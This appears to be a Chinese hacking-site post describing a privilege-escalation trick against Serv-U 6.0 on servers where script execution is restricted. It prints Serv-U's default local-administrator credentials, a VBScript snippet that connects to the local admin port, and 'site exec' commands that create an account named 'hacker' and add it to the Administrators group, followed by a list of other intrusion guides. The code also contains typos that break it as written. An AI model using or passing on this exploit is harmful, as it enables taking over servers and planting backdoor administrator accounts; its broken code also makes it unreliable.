[推荐]Serv-u6.0提权新招适用环境:服务器禁用FSO,关掉Wscript.shelll,没有执行权限。
限制:没有更改管理员的密码,或者破解出了Serv-U的管理员的密码。Serv-U默认用户名:localadministrator 密码:#|@$ak#.|k;0@p 下面用MSWinsock。Winsock建立一个连接,并且以System权限添加超级用户,代码如下:
| 以下是引用片段: Dim revdata Dim sendata Set sock=createobject(“MSWinsock.Winsock”) Sock.protocol=0 Sock.connect “127.0.0.1”,43958 Sendata=”LocalAdministrator”& chr(10) &chr(13) Sock.senddata snedata Sendata=”#|@$ak#.|k;0@p” &chr(10) &chr(13) Sock.senddata.sendata |
使用这个代码就可以连上FTP了,接下来用Sock.senddata sendata 发送添加有执行权限用户的命令,想必大家该知道怎么做了吧,对了,就是用”site exec net user hacker hacker /add” “site exec net localgroup administrators hacker /add”
呵呵,就这样系统权限到手了,祝大家好运!
| Serv-u6.0提权新招 | 07-04 | |
| 用“电驴”抓肉鸡 | 06-29 | |
| MS07-029漏洞利用入侵过程 | 05-30 | |
| 实例讲解:入侵JSP网站服务器 | 05-09 | |
| 利用ANI漏洞攻破VISTA系统[视频演 | 04-11 | |
| 利用php.exe进行入侵 | 04-08 | |
| 渗透心得 | 04-07 | |
| 魔力论坛最新漏洞利用 | 04-07 | |
| 织梦内容管理系统(DEDECMS)3.X | 04-07 | |
| asp.dll解析成system提升权限 | 04-06 | |
| webshell+serv-u获取系统最高权限 | 04-06 | |
| bbsxp sql最新版0day | 03-30 | |
您现在的位置: